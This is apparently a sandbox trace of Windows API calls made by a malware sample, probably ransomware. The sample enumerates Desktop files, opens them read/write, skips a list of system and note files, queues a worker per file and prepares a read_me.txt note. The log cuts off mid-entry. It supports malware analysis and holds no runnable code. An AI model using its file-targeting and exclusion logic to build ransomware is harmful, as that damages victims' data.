[0075.945] QueueUserWorkItem (Function=0x404e00, Context=0x7d0, Flags=0x0) returned 1 [0075.945] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd52671d0, ftCreationTime.dwHighDateTime=0x1d4c5c6, ftLastAccessTime.dwLowDateTime=0xdf4583b0, ftLastAccessTime.dwHighDateTime=0x1d4d2b7, ftLastWriteTime.dwLowDateTime=0xdf4583b0, ftLastWriteTime.dwHighDateTime=0x1d4d2b7, nFileSizeHigh=0x0, nFileSizeLow=0x152bc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pdxnl.bmp", cAlternateFileName="")) returned 1 [0075.945] wnsprintfW (in: pszDest=0x8de1100, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pdxnl.bmp") returned 51 [0075.945] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pdxnl.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pdxnl.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7d8 [0075.948] StrStrW (lpFirst="pdxnl.bmp", lpSrch="read_me.txt") returned 0x0 [0075.948] StrStrW (lpFirst="pdxnl.bmp", lpSrch="autoexec.bat") returned 0x0 [0075.948] StrStrW (lpFirst="pdxnl.bmp", lpSrch="desktop.ini") returned 0x0 [0075.948] StrStrW (lpFirst="pdxnl.bmp", lpSrch="autorun.inf") returned 0x0 [0075.948] StrStrW (lpFirst="pdxnl.bmp", lpSrch="ntuser.dat") returned 0x0 [0075.948] StrStrW (lpFirst="pdxnl.bmp", lpSrch="iconcache.db") returned 0x0 [0075.948] StrStrW (lpFirst="pdxnl.bmp", lpSrch="bootsect.bak") returned 0x0 [0075.948] StrStrW (lpFirst="pdxnl.bmp", lpSrch="boot.ini") returned 0x0 [0075.948] StrStrW (lpFirst="pdxnl.bmp", lpSrch="ntuser.dat.log") returned 0x0 [0075.948] StrStrW (lpFirst="pdxnl.bmp", lpSrch="thumbs.db") returned 0x0 [0075.948] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 24 [0075.948] QueueUserWorkItem (Function=0x404e00, Context=0x7d8, Flags=0x0) returned 1 [0075.948] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x246a5360, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x246a5360, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x246cb4c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0075.948] wnsprintfW (in: pszDest=0x8de1100, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\read_me.txt") returned 53 [0075.948] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7dc [0075.949] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0075.949] CloseHandle (hObject=0x7dc) returned 1 [0075.949] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc13f9be0, ftCreationTime.dwHighDateTime=0x1d4cf7d, ftLastAccessTime.dwLowDateTime=0x246a5360, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x246a5360, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ReE1ZSiCxXt 9A", cAlternateFileName="REE1ZS~1")) returned 1 [0075.949] wnsprintfW (in: pszDest=0x8de1100, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReE1ZSiCxXt 9A") returned 56 [0075.949] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec0b2b00, ftCreationTime.dwHighDateTime=0x1d4cf82, ftLastAccessTime.dwLowDateTime=0xc0dca30, ftLastAccessTime.dwHighDateTime=0x1d4c6a9, ftLastWriteTime.dwLowDateTime=0xc0dca30, ftLastWriteTime.dwHighDateTime=0x1d4c6a9, nFileSizeHigh=0x0, nFileSizeLow=0x1316c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="S_xV8DrCXA1qqj8mB.swf", cAlternateFileName="S_XV8D~1.SWF")) returned 1 [0075.949] wnsprintfW (in: pszDest=0x8de1100, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\S_xV8DrCXA1qqj8mB.swf") returned 63 [0075.949] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\S_xV8DrCXA1qqj8mB.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\s_xv8drcxa1qqj8mb.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7dc [0075.949] StrStrW (lpFirst="s_xv8drcxa1qqj8mb.swf", lpSrch="read_me.txt") returned 0x0 [0075.949] StrStrW (lpFirst="s_xv8drcxa1qqj8mb.swf", lpSrch="autoexec.bat") returned 0x0 [0075.949] StrStrW (lpFirst="s_xv8drcxa1qqj8mb.swf", lpSrch="desktop.ini") returned 0x0 [0075.949] StrStrW (lpFirst="s_xv8drcxa1qqj8mb.swf", lpSrch="autorun.inf") returned 0x0 [0075.949] StrStrW (lpFirst="s_xv8drcxa1qqj8mb.swf", lpSrch="ntuser.dat") returned 0x0 [0075.949] StrStrW (lpFirst="s_xv8drcxa1qqj8mb.swf", lpSrch="iconcache.db") returned 0x0 [0075.949] StrStrW (lpFirst="s_xv8drcxa1qqj8mb.swf", lpSrch="bootsect.bak") returned 0x0 [0075.949] StrStrW (lpFirst="s_xv8drcxa1qqj8mb.swf", lpSrch="boot.ini") returned 0x0 [0075.949] StrStrW (lpFirst="s_xv8drcxa1qqj8mb.swf", lpSrch="ntuser.dat.log") returned 0x0 [0075.949] StrStrW (lpFirst="s_xv8drcxa1qqj8mb.swf", lpSrch="thumbs.db") returned 0x0 [0075.949] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 25 [0075.949] QueueUserWorkItem (Function=0x404e00, Context=0x7dc, Flags=0x0) returned 1 [0075.949] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8bf10c0, ftCreationTime.dwHighDateTime=0x1d4d54f, ftLastAccessTime.dwLowDateTime=0x4724c4a0, ftLastAccessTime.dwHighDateTime=0x1d4cacf, ftLastWriteTime.dwLowDateTime=0x4724c4a0, ftLastWriteTime.dwHighDateTime=0x1d4cacf, nFileSizeHigh=0x0, nFileSizeLow=0xd4fb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="T-qEmnB.m4a", cAlternateFileName="")) returned 1 [0075.950] wnsprintfW (in: pszDest=0x8de1100, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T-qEmnB.m4a") returned 53 [0075.950] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T-qEmnB.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\t-qemnb.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7e0 [0075.950] StrStrW (lpFirst="t-qemnb.m4a", lpSrch="read_me.txt") returned 0x0 [0075.950] StrStrW (lpFirst="t-qemnb.m4a", lpSrch="autoexec.bat") returned 0x0 [0075.950] StrStrW (lpFirst="t-qemnb.m4a", lpSrch="desktop.ini") returned 0x0 [0075.950] StrStrW (lpFirst="t-qemnb.m4a", lpSrch="autorun.inf") returned 0x0 [0075.950] StrStrW (lpFirst="t-qemnb.m4a", lpSrch="ntuser.dat") returned 0x0 [0075.950] StrStrW (lpFirst="t-qemnb.m4a", lpSrch="iconcache.db") returned 0x0 [0075.950] StrStrW (lpFirst="t-qemnb.m4a", lpSrch="bootsect.bak") returned 0x0 [0075.950] StrStrW (lpFirst="t-qemnb.m4a", lpSrch="boot.ini") returned 0x0 [0075.950] StrStrW (lpFirst="t-qemnb.m4a", lpSrch="ntuser.dat.log") returned 0x0 [0075.950] StrStrW (lpFirst="t-qemnb.m4a", lpSrch="thumbs.db") returned 0x0 [0075.950] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 26 [0075.950] QueueUserWorkItem (Function=0x404e00, Context=0x7e0, Flags=0x0) returned 1 [0075.950] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdff963a0, ftCreationTime.dwHighDateTime=0x1d4d265, ftLastAccessTime.dwLowDateTime=0x7d5de110, ftLastAccessTime.dwHighDateTime=0x1d4cfe2, ftLastWriteTime.dwLowDateTime=0x7d5de110, ftLastWriteTime.dwHighDateTime=0x1d4cfe2, nFileSizeHigh=0x0, nFileSizeLow=0xe4c2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tHkYo.gif", cAlternateFileName="")) returned 1 [0075.950] wnsprintfW (in: pszDest=0x8de1100, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tHkYo.gif") returned 51 [0075.950] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tHkYo.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\thkyo.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7e4 [0075.950] StrStrW (lpFirst="thkyo.gif", lpSrch="read_me.txt") returned 0x0 [0075.951] StrStrW (lpFirst="thkyo.gif", lpSrch="autoexec.bat") returned 0x0 [0075.951] StrStrW (lpFirst="thkyo.gif", lpSrch="desktop.ini") returned 0x0 [0075.951] StrStrW (lpFirst="thkyo.gif", lpSrch="autorun.inf") returned 0x0 [0075.951] StrStrW (lpFirst="thkyo.gif", lpSrch="ntuser.dat") returned 0x0 [0075.951] StrStrW (lpFirst="thkyo.gif", lpSrch="iconcache.db") returned 0x0 [0075.951] StrStrW (lpFirst="thkyo.gif", lpSrch="bootsect.bak") returned 0x0 [0075.951] StrStrW (lpFirst="thkyo.gif", lpSrch="boot.ini") returned 0x0 [0075.951] StrStrW (lpFirst="thkyo.gif", lpSrch="ntuser.dat.log") returned 0x0 [0075.951] StrStrW (lpFirst="thkyo.gif", lpSrch="thumbs.db") returned 0x0 [0075.951] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 27 [0075.951] QueueUserWorkItem (Function=0x404e00, Context=0x7e4, Flags=0x0) returned 1 [0075.951] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70ce8970, ftCreationTime.dwHighDateTime=0x1d4c689, ftLastAccessTime.dwLowDateTime=0xde7f9430, ftLastAccessTime.dwHighDateTime=0x1d4d37e, ftLastWriteTime.dwLowDateTime=0xde7f9430, ftLastWriteTime.dwHighDateTime=0x1d4d37e, nFileSizeHigh=0x0, nFileSizeLow=0x32f7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tKb0W.m4a", cAlternateFileName="")) returned 1 [0075.951] wnsprintfW (in: pszDest=0x8de1100, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tKb0W.m4a") returned 51 [0075.951] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tKb0W.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tkb0w.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7e8 [0075.951] StrStrW (lpFirst="tkb0w.m4a", lpSrch="read_me.txt") returned 0x0 [0075.951] StrStrW (lpFirst="tkb0w.m4a", lpSrch="autoexec.bat") returned 0x0 [0075.951] StrStrW (lpFirst="tkb0w.m4a", lpSrch="desktop.ini") returned 0x0 [0075.951] StrStrW (lpFirst="tkb0w.m4a", lpSrch="autorun.inf") returned 0x0 [0075.951] StrStrW (lpFirst="tkb0w.m4a", lpSrch="ntuser.dat") returned 0x0 [0075.951] StrStrW (lpFirst="tkb0w.m4a", lpSrch="iconcache.db") returned 0x0 [0075.951] StrStrW (lpFirst="tkb0w.m4a", lpSrch="bootsect.bak") returned 0x0 [0075.952] StrStrW (lpFirst="tkb0w.m4a", lpSrch="boot.ini") returned 0x0 [0075.952] StrStrW (lpFirst="tkb0w.m4a", lpSrch="ntuser.dat.log") returned 0x0 [0075.952] StrStrW (lpFirst="tkb0w.m4a", lpSrch="thumbs.db") returned 0x0 [0075.952] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 28 [0075.952] QueueUserWorkItem (Function=0x404e00, Context=0x7e8, Flags=0x0) returned 1 [0075.952] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb414470, ftCreationTime.dwHighDateTime=0x1d4d0b8, ftLastAccessTime.dwLowDateTime=0x3f731390, ftLastAccessTime.dwHighDateTime=0x1d4c5d1, ftLastWriteTime.dwLowDateTime=0x3f731390, ftLastWriteTime.dwHighDateTime=0x1d4c5d1, nFileSizeHigh=0x0, nFileSizeLow=0x1427f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uhNakSJy2.m4a", cAlternateFileName="UHNAKS~1.M4A")) returned 1 [0075.952] wnsprintfW (in: pszDest=0x8de1100, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uhNakSJy2.m4a") returned 55 [0075.952] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uhNakSJy2.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\uhnaksjy2.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7ec [0075.952] StrStrW (lpFirst="uhnaksjy2.m4a", lpSrch="read_me.txt") returned 0x0 [0075.952] StrStrW (lpFirst="uhnaksjy2.m4a", lpSrch="autoexec.bat") returned 0x0 [0075.952] StrStrW (lpFirst="uhnaksjy2.m4a", lpSrch="desktop.ini") returned 0x0 [0075.952] StrStrW (lpFirst="uhnaksjy2.m4a", lpSrch="autorun.inf") returned 0x0 [0075.952] StrStrW (lpFirst="uhnaksjy2.m4a", lpSrch="ntuser.dat") returned 0x0 [0075.952] StrStrW (lpFirst="uhnaksjy2.m4a", lpSrch="iconcache.db") returned 0x0 [0075.952] StrStrW (lpFirst="uhnaksjy2.m4a", lpSrch="bootsect.bak") returned 0x0 [0075.952] StrStrW (lpFirst="uhnaksjy2.m4a", lpSrch="boot.ini") returned 0x0 [0075.952] StrStrW (lpFirst="uhnaksjy2.m4a", lpSrch="ntuser.dat.log") returned 0x0 [0075.952] StrStrW (lpFirst="uhnaksjy2.m4a", lpSrch="thumbs.db") returned 0x0 [0075.952] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 29 [0075.952] QueueUserWorkItem (Function=0x404e00, Context=0x7ec, Flags=0x0) returned 1 [0075.952] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe2cd600, ftCreationTime.dwHighDateTime=0x1d5a040, ftLastAccessTime.dwLowDateTime=0xfe2cd600, ftLastAccessTime.dwHighDateTime=0x1d5a040, ftLastWriteTime.dwLowDateTime=0xfa994f00, ftLastWriteTime.dwHighDateTime=0x1d5a040, nFileSizeHigh=0x0, nFileSizeLow=0x3b000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Wacatac_2019-11-20_19-54.exe", cAlternateFileName="WACATA~1.EXE")) returned 1 [0075.952] wnsprintfW (in: pszDest=0x8de1100, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Wacatac_2019-11-20_19-54.exe") returned 70 [0075.952] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Wacatac_2019-11-20_19-54.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wacatac_2019-11-20_19-54.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.953] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x446db200, ftCreationTime.dwHighDateTime=0x1d4cf50, ftLastAccessTime.dwLowDateTime=0xebd30d40, ftLastAccessTime.dwHighDateTime=0x1d4c72d, ftLastWriteTime.dwLowDateTime=0xebd30d40, ftLastWriteTime.dwHighDateTime=0x1d4c72d, nFileSizeHigh=0x0, nFileSizeLow=0x8588, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WiZ2x.m4a", cAlternateFileName="")) returned 1 [0075.953] wnsprintfW (in: pszDest=0x8de1100, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WiZ2x.m4a") returned 51 [0075.953] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WiZ2x.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wiz2x.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7f0 [0075.953] StrStrW (lpFirst="wiz2x.m4a", lpSrch="read_me.txt") returned 0x0 [0075.953] StrStrW (lpFirst="wiz2x.m4a", lpSrch="autoexec.bat") returned 0x0 [0075.953] StrStrW (lpFirst="wiz2x.m4a", lpSrch="desktop.ini") returned 0x0 [0075.953] StrStrW (lpFirst="wiz2x.m4a", lpSrch="autorun.inf") returned 0x0 [0075.953] StrStrW (lpFirst="wiz2x.m4a", lpSrch="ntuser.dat") returned 0x0 [0075.953] StrStrW (lpFirst="wiz2x.m4a", lpSrch="iconcache.db") returned 0x0 [0075.953] StrStrW (lpFirst="wiz2x.m4a", lpSrch="bootsect.bak") returned 0x0 [0075.953] StrStrW (lpFirst="wiz2x.m4a", lpSrch="boot.ini") returned 0x0 [0075.953] StrStrW (lpFirst="wiz2x.m4a", lpSrch="ntuser.dat.log") returned 0x0 [0075.953] StrStrW (lpFirst="wiz2x.m4a", lpSrch="thumbs.db") returned 0x0 [0075.953] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 30 [0075.953] QueueUserWorkItem (Function=0x404e00, Context=0x7f0, Flags=0x0) returned 1 [0075.953] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5018cb0, ftCreationTime.dwHighDateTime=0x1d4cf0b, ftLastAccessTime.dwLowDateTime=0x6c246870, ftLastAccessTime.dwHighDateTime=0x1d4c9a1, ftLastWriteTime.dwLowDateTime=0x6c246870, ftLastWriteTime.dwHighDateTime=0x1d4c9a1, nFileSizeHigh=0x0, nFileSizeLow=0xf675, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="z_3uPlAJZMtKG.mkv", cAlternateFileName="Z_3UPL~1.MKV")) returned 1 [0075.953] wnsprintfW (in: pszDest=0x8de1100, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\z_3uPlAJZMtKG.mkv") returned 59 [0075.953] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\z_3uPlAJZMtKG.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\z_3uplajzmtkg.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7f4 [0075.953] StrStrW (lpFirst="z_3uplajzmtkg.mkv", lpSrch="read_me.txt") returned 0x0 [0075.953] StrStrW (lpFirst="z_3uplajzmtkg.mkv", lpSrch="autoexec.bat") returned 0x0 [0075.954] StrStrW (lpFirst="z_3uplajzmtkg.mkv", lpSrch="desktop.ini") returned 0x0 [0075.954] StrStrW (lpFirst="z_3uplajzmtkg.mkv", lpSrch="autorun.inf") returned 0x0 [0075.954] StrStrW (lpFirst="z_3uplajzmtkg.mkv", lpSrch="ntuser.dat") returned 0x0 [0075.954] StrStrW (lpFirst="z_3uplajzmtkg.mkv", lpSrch="iconcache.db") returned 0x0 [0075.954] StrStrW (lpFirst="z_3uplajzmtkg.mkv", lpSrch="bootsect.bak") returned 0x0 [0075.954] StrStrW (lpFirst="z_3uplajzmtkg.mkv", lpSrch="boot.ini") returned 0x0 [0075.954] StrStrW (lpFirst="z_3uplajzmtkg.mkv", lpSrch="ntuser.dat.log") returned 0x0 [0075.954] StrStrW (lpFirst="z_3uplajzmtkg.mkv", lpSrch="thumbs.db") returned 0x0 [0075.954] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 31 [0075.954] QueueUserWorkItem (Function=0x404e00, Context=0x7f4, Flags=0x0) returned 1 [0075.954] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a371300, ftCreationTime.dwHighDateTime=0x1d4cc1b, ftLastAccessTime.dwLowDateTime=0xe6b73700, ftLastAccessTime.dwHighDateTime=0x1d4cbab, ftLastWriteTime.dwLowDateTime=0xe6b73700, ftLastWriteTime.dwHighDateTime=0x1d4cbab, nFileSizeHigh=0x0, nFileSizeLow=0x4971, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_btdHeL3.png", cAlternateFileName="")) returned 1 [0075.954] wnsprintfW (in: pszDest=0x8de1100, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_btdHeL3.png") returned 54 [0075.954] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_btdHeL3.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_btdhel3.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7f8 [0075.954] StrStrW (lpFirst="_btdhel3.png", lpSrch="read_me.txt") returned 0x0 [0075.954] StrStrW (lpFirst="_btdhel3.png", lpSrch="autoexec.bat") returned 0x0 [0075.954] StrStrW (lpFirst="_btdhel3.png", lpSrch="desktop.ini") returned 0x0 [0075.954] StrStrW (lpFirst="_btdhel3.png", lpSrch="autorun.inf") returned 0x0 [0075.954] StrStrW (lpFirst="_btdhel3.png", lpSrch="ntuser.dat") returned 0x0 [0075.954] StrStrW (lpFirst="_btdhel3.png", lpSrch="iconcache.db") returned 0x0 [0075.954] StrStrW (lpFirst="_btdhel3.png", lpSrch="bootsect.bak") returned 0x0 [0075.954] StrStrW (lpFirst="_btdhel3.png", lpSrch="boot.ini") returned 0x0 [0075.954] StrStrW (lpFirst="_btdhel3.png", lpSrch="ntuser.dat.log") returned 0x0 [0075.954] StrStrW (lpFirst="_btdhel3.png", lpSrch="thumbs.db") returned 0x0 [0075.954] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 32 [0075.955] QueueUserWorkItem (Function=0x404e00, Context=0x7f8, Flags=0x0) returned 1 [0075.955] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a371300, ftCreationTime.dwHighDateTime=0x1d4cc1b, ftLastAccessTime.dwLowDateTime=0xe6b73700, ftLastAccessTime.dwHighDateTime=0x1d4cbab, ftLastWriteTime.dwLowDateTime=0xe6b73700, ftLastWriteTime.dwHighDateTime=0x1d4cbab, nFileSizeHigh=0x0, nFileSizeLow=0x4971, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_btdhel3.png", cAlternateFileName="")) returned 0 [0075.955] FindClose (in: hFindFile=0x7cfe9a8 | out: hFindFile=0x7cfe9a8) returned 1 [0075.955] wnsprintfW (in: pszDest=0x8de1100, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\read_me.txt") returned 53 [0075.955] GetProcessHeap () returned 0x4f10000 [0075.955] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8de1100 | out: hHeap=0x4f10000) returned 1 [0075.955] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 38 [0075.955] GetProcessHeap () returned 0x4f10000 [0075.955] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b20098 | out: hHeap=0x4f10000) returned 1 [0075.984] GetProcessHeap () returned 0x4f10000 [0075.984] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8e31128 [0075.984] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\*") returned 63 [0075.984] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x22aa8ca0, ftCreationTime.dwHighDateTime=0x1d4cb7d, ftLastAccessTime.dwLowDateTime=0x246a5360, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x246a5360, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe9e8 [0075.985] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\.") returned 63 [0075.985] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x22aa8ca0, ftCreationTime.dwHighDateTime=0x1d4cb7d, ftLastAccessTime.dwLowDateTime=0x246a5360, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x246a5360, 